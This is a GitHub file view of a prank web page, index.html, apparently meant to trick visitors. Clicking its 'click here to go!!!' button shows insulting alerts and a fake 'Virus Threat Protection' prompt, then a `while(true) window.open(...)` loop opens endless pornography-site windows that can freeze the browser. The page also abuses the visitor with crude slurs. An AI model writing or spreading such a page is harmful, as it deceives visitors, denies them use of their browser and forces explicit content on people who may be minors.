-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
44 lines (39 loc) · 949 Bytes
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
-<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>Gyatt!</title>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<script src="script.js"></script>
</body>
</html>
<p style="text-align:center;"> ⬇</p>
<center>
<button onclick="next()">click here to go!!!</button>
</center>
<p id="demo"></p>
<center>
</center>
</p>
<script>
function next() {
alert ("⚠BITCH U R DUMB⚠");
confirm ("enable Virus Threat Protection?");
window.open ("https://www.pornhub.com")
function sleep(milliseconds) {
const date = Date.now();
let currentDate = null;
do {
currentDate = Date.now();
} while (currentDate - date < milliseconds);
}
alert ("I wish u get a problem u dumb ass pussy");
sleep (500);
while(true) window.open("https://www.pornhub.com");
alert ("Enjoy!");
}
</script>
<body style="background-color:powderblue;">